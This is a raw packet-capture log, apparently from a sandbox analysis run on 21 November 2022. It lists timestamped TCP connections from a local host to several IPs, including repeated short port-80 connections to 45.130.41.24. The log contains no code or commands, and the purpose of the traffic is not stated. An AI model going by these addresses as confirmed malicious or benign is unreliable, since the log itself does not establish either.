                                                                                                                                                                                    Nov 21, 2022 19:18:36.541668892 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.541692019 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.541904926 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.541927099 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.542077065 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.542103052 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.542244911 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.542260885 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.542443037 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.542505980 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.542531967 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.542960882 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.542969942 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.542998075 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.543210030 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.543235064 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.543476105 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.543544054 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.543575048 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.543687105 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.543797016 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.543798923 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.543826103 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.543948889 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.543948889 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.544258118 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.544418097 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.544472933 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.544631958 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.544658899 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.544790983 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.544820070 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.545008898 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.545134068 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.545316935 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.545345068 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.545495033 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.545511007 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.545656919 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.545679092 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.545826912 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.545866013 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.546026945 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.546062946 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.546205997 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.546245098 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.546412945 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.546444893 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.546627998 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.546761036 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.546928883 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.546957970 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.547105074 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.547122002 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.547266960 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.547283888 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.547430992 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.547457933 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.547564983 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.547585964 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.547734976 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.547760010 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.547909021 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.547934055 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.548077106 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.548094034 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.548249006 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.548542976 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.548702955 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.548728943 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.548880100 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.548950911 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.549185991 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.549212933 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.549391985 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.549420118 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.549444914 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.549607992 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.549690008 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.549880028 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.549906969 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.550137997 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.550173044 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.550373077 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.550400019 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.550573111 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.550595045 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.550760031 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.550781012 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.550924063 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.550950050 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.551093102 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.551122904 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.551301003 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.551311970 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.551337004 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.551464081 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.551464081 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.551625967 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.551791906 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.551824093 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.551991940 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.552001953 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.552037954 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.552181959 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.552181959 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.552218914 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.552460909 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.552644014 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.552798033 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.552841902 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.553013086 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.553041935 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.553064108 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.553200960 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.553200960 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.553234100 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.553342104 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.553388119 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.553411007 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.553487062 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.553551912 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.553556919 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.553577900 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.553718090 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.553742886 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.553867102 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.553901911 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.553926945 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.554028988 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.554071903 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.554091930 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.554254055 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.554342031 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.554364920 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.554478884 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.554502010 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.554600000 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.554703951 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.554718971 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.554739952 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.554938078 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.555042982 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.555049896 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.555176973 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.555233002 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.555258989 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.555398941 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.555414915 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.555521965 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.555620909 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.555653095 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.555675030 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.555964947 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.555983067 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.556021929 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.556247950 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.556323051 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.556337118 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.556370020 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.556510925 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.556623936 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.556679964 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.556703091 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.556837082 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.556958914 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.556977987 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.557009935 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.557123899 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.557276011 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.557297945 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.557456970 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.557478905 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.557667017 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.557761908 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.557790995 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.557888031 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.557934999 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.557954073 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.558072090 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.558094978 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.558116913 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.558222055 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.558222055 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.558253050 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.558384895 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.558543921 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.558545113 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.558545113 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.558604002 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.558763981 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.558763981 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.558814049 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.558820009 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.558844090 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.558990002 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.559040070 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.559073925 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.559102058 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.559149027 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.559165955 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.559166908 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.559290886 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:20:01.746260881 CET4982580192.168.11.2045.33.23.183
                                                                                                                                                                                    Nov 21, 2022 19:20:01.881984949 CET804982545.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:01.882216930 CET4982580192.168.11.2045.33.23.183
                                                                                                                                                                                    Nov 21, 2022 19:20:01.882328033 CET4982580192.168.11.2045.33.23.183
                                                                                                                                                                                    Nov 21, 2022 19:20:02.018975019 CET804982545.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:02.019040108 CET804982545.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:02.019280910 CET4982580192.168.11.2045.33.23.183
                                                                                                                                                                                    Nov 21, 2022 19:20:02.019398928 CET4982580192.168.11.2045.33.23.183
                                                                                                                                                                                    Nov 21, 2022 19:20:02.155261993 CET804982545.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:17.238184929 CET4982680192.168.11.2045.130.41.24
                                                                                                                                                                                    Nov 21, 2022 19:20:17.296993971 CET804982645.130.41.24192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:17.297283888 CET4982680192.168.11.2045.130.41.24
                                                                                                                                                                                    Nov 21, 2022 19:20:17.297430992 CET4982680192.168.11.2045.130.41.24
                                                                                                                                                                                    Nov 21, 2022 19:20:17.356602907 CET804982645.130.41.24192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:17.391448021 CET804982645.130.41.24192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:17.391561985 CET804982645.130.41.24192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:17.391779900 CET4982680192.168.11.2045.130.41.24
                                                                                                                                                                                    Nov 21, 2022 19:20:18.301490068 CET4982680192.168.11.2045.130.41.24
                                                                                                                                                                                    Nov 21, 2022 19:20:19.317296028 CET4982780192.168.11.2045.130.41.24
                                                                                                                                                                                    Nov 21, 2022 19:20:19.375588894 CET804982745.130.41.24192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:19.375962973 CET4982780192.168.11.2045.130.41.24
                                                                                                                                                                                    Nov 21, 2022 19:20:19.376054049 CET4982780192.168.11.2045.130.41.24
                                                                                                                                                                                    Nov 21, 2022 19:20:19.434655905 CET804982745.130.41.24192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:19.468588114 CET804982745.130.41.24192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:19.468632936 CET804982745.130.41.24192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:19.469192028 CET4982780192.168.11.2045.130.41.24
                                                                                                                                                                                    Nov 21, 2022 19:20:20.379359961 CET4982780192.168.11.2045.130.41.24
                                                                                                                                                                                    Nov 21, 2022 19:20:21.394903898 CET4982880192.168.11.2045.130.41.24
                                                                                                                                                                                    Nov 21, 2022 19:20:21.452130079 CET804982845.130.41.24192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:21.452413082 CET4982880192.168.11.2045.130.41.24
                                                                                                                                                                                    Nov 21, 2022 19:20:21.453052998 CET4982880192.168.11.2045.130.41.24
                                                                                                                                                                                    Nov 21, 2022 19:20:21.453119993 CET4982880192.168.11.2045.130.41.24
                                                                                                                                                                                    Nov 21, 2022 19:20:21.510735989 CET804982845.130.41.24192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:21.510792017 CET804982845.130.41.24192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:21.510832071 CET804982845.130.41.24192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:21.510911942 CET4982880192.168.11.2045.130.41.24
                                                                                                                                                                                    Nov 21, 2022 19:20:21.511076927 CET4982880192.168.11.2045.130.41.24
                                                                                                                                                                                    Nov 21, 2022 19:20:21.511188984 CET804982845.130.41.24192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:21.511239052 CET804982845.130.41.24192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:21.511414051 CET4982880192.168.11.2045.130.41.24
                                                                                                                                                                                    Nov 21, 2022 19:20:21.511444092 CET804982845.130.41.24192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:21.511584044 CET4982880192.168.11.2045.130.41.24
                                                                                                                                                                                    Nov 21, 2022 19:20:21.511738062 CET804982845.130.41.24192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:21.511754990 CET4982880192.168.11.2045.130.41.24
                                                                                                                                                                                    Nov 21, 2022 19:20:21.511897087 CET804982845.130.41.24192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:21.511921883 CET4982880192.168.11.2045.130.41.24
                                                                                                                                                                                    Nov 21, 2022 19:20:21.512089968 CET4982880192.168.11.2045.130.41.24
                                                                                                                                                                                    Nov 21, 2022 19:20:21.512125969 CET804982845.130.41.24192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:21.512428999 CET4982880192.168.11.2045.130.41.24
                                                                                                                                                                                    Nov 21, 2022 19:20:21.512448072 CET804982845.130.41.24192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:21.512767076 CET4982880192.168.11.2045.130.41.24
                                                                                                                                                                                    Nov 21, 2022 19:20:21.568478107 CET804982845.130.41.24192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:21.568535089 CET804982845.130.41.24192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:21.568655014 CET804982845.130.41.24192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:21.568785906 CET4982880192.168.11.2045.130.41.24
                                                                                                                                                                                    Nov 21, 2022 19:20:21.568896055 CET804982845.130.41.24192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:21.568900108 CET4982880192.168.11.2045.130.41.24
                                                                                                                                                                                    Nov 21, 2022 19:20:21.568981886 CET804982845.130.41.24192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:21.569034100 CET804982845.130.41.24192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:21.569190979 CET804982845.130.41.24192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:21.569222927 CET4982880192.168.11.2045.130.41.24
                                                                                                                                                                                    Nov 21, 2022 19:20:21.569489002 CET804982845.130.41.24192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:21.569772005 CET804982845.130.41.24192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:21.569879055 CET804982845.130.41.24192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:21.569984913 CET804982845.130.41.24192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:21.570082903 CET804982845.130.41.24192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:21.626398087 CET804982845.130.41.24192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:21.626452923 CET804982845.130.41.24192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:21.626530886 CET804982845.130.41.24192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:21.626796007 CET804982845.130.41.24192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:21.627033949 CET804982845.130.41.24192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:21.662648916 CET804982845.130.41.24192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:21.662708044 CET804982845.130.41.24192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:21.662925005 CET4982880192.168.11.2045.130.41.24
                                                                                                                                                                                    Nov 21, 2022 19:20:22.456907034 CET4982880192.168.11.2045.130.41.24
                                                                                                                                                                                    Nov 21, 2022 19:20:23.472515106 CET4982980192.168.11.2045.130.41.24
                                                                                                                                                                                    Nov 21, 2022 19:20:23.526709080 CET804982945.130.41.24192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:23.526905060 CET4982980192.168.11.2045.130.41.24
                                                                                                                                                                                    Nov 21, 2022 19:20:23.527010918 CET4982980192.168.11.2045.130.41.24
                                                                                                                                                                                    Nov 21, 2022 19:20:23.581439972 CET804982945.130.41.24192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:23.896471977 CET804982945.130.41.24192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:23.896533966 CET804982945.130.41.24192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:23.896800041 CET4982980192.168.11.2045.130.41.24
                                                                                                                                                                                    Nov 21, 2022 19:20:23.896882057 CET4982980192.168.11.2045.130.41.24
                                                                                                                                                                                    Nov 21, 2022 19:20:23.951047897 CET804982945.130.41.24192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:29.232722998 CET4983080192.168.11.20154.204.24.45
